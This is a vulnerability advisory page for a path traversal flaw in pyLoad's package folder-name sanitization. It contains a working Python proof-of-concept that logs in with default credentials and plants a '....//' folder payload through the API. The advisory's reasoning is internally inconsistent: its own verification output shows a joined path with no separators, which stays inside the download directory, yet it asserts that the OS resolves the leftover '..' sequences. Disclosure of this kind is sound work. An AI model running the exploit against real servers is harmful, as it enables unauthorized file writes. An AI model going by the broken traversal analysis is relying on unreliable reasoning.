CVE-2026-42314

MEDIUM6.5EPSS 0.06%

PyLoad Vulnerable to Path Traversal via Package Folder Name

Published: 5/5/2026Modified: 5/20/2026

Also known as:GHSA-97r3-5w84-r4q8PYSEC-2026-128

Description

Insufficient sanitization of package folder names allows writing files outside the intended download directory. ## Affected Component - `src/pyload/core/api/__init__.py` - Function: `add_package()` ## Description Package folder names are sanitized using insufficient string replacement: ```python folder = ( folder.replace("http://", "") .replace("https://", "") .replace("../", "_") # Bypassable! .replace("..\\", "_") .replace(":", "") .replace("/", "_") .replace("\\", "_") ) ``` The `../` replacement is bypassable. The pattern `....//` becomes `.._` after replacement (partial removal), leaving `..` which can be exploited when the path is later resolved by the OS. ## Proof of Concept ### Setup ```bash pip install pyload-ng[all] pyload -d & # Default credentials: pyload / pyload ``` ### Exploit ```python #!/usr/bin/env python3 import requests BASE_URL = "http://localhost:8000" USERNAME = "pyload" PASSWORD = "pyload" session = requests.Session() # Login session.post(f"{BASE_URL}/login", data={ "username": USERNAME, "password": PASSWORD }) # Create package with malicious folder name # The pattern ....// bypasses the ../ replacement # After sanitization: .._ (still contains ..) folder_payload = "....//....//....//tmp/evil" resp = session.post(f"{BASE_URL}/api/add_package", json={ "name": "test_package", "links": ["http://example.com/file.txt"], "dest": 1 # Destination.QUEUE }) package_id = resp.json() print(f"Created package: {package_id}") # Set malicious folder name resp = session.post(f"{BASE_URL}/api/set_package_data", json={ "package_id": package_id, "data": {"folder": folder_payload} }) print(f"Set folder payload: {folder_payload}") print(f"Response: {resp.status_code}") # When download occurs, files will be written outside download dir print("[+] When a file is downloaded, it will be written to manipulated path") print(" The sanitized folder still contains '..' sequences that OS resolves") ``` ### Verification Check where files would be written: ```python import os download_dir = "/home/user/Downloads" folder = "....//....//....//tmp/evil" # Simulate pyLoad's sanitization sanitized = folder.replace("../", "_").replace("/", "_") print(f"After pyLoad sanitization: {sanitized}") # Output: .._.._.._tmp_evil # When pyLoad does os.path.join and then opens the file: final_path = os.path.join(download_dir, sanitized) print(f"Joined path: {final_path}") # Output: /home/user/Downloads/.._.._.._tmp_evil # The .. sequences remain and could be resolved by OS during file operations ``` ## Impact Authenticated users with ADD permission can: - Write files outside the download directory - Potentially overwrite system files (depending on permissions) - Clutter system directories with downloaded content

Affected packages (2)

PyPI/pyload-ngfrom 0, < 0.5.0b3.dev100
PyPI/pyload-ngfrom 0, < 0.5.0b3.dev100

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 3.1	MEDIUM6.5	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Description

Affected packages (2)

CVSS scores

References (3)